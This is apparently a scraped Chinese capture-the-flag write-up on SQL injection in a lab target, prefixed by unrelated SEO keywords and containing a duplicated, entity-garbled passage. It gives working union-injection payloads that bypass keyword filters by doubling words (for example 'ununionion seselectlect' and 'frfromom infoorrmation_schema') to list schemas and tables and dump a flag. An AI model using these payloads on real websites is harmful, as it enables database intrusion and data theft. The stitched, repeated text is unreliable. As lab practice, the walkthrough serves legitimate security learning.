网站 名词解释,wordpress添加地图,女生学大数据很累吗,西安公司网站设计费用进入靶场 随便输输 再输输 可以判断是单引号闭合
再随便输输 查询字段数量 得#xff0c;过滤了 关键字也过滤了
只能双写了 根据回显#xff0c;这样可以#xff0c;只是需要改改
1,2不行
1,2,3行
1,2,3,4不行 可以尝试得到库名#xff0c;表名了
库名 database(…
进入靶场 随便输输 再输输 可以判断是单引号闭合
再随便输输 查询字段数量 得过滤了 关键字也过滤了
只能双写了 根据回显这样可以只是需要改改
1,2不行
1,2,3行
1,2,3,4不行 可以尝试得到库名表名了
库名 database()
DATABASE() 是 MySQL 中的一个函数它返回当前选定或默认数据库的名称。 group_concat(table_name) infmation_schema.table_schemadataba at line 1 过滤了双写
查库名 group_concat(schema_name) frfromom infoorrmation_schema.schemata 查表名 seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema ctf 1 ununionion seselectlect 1,2,group_concat(flag) frfromom ctf.Flag flag{e84e4db1-9040-4f81-9416-73a7eac9c6b1}
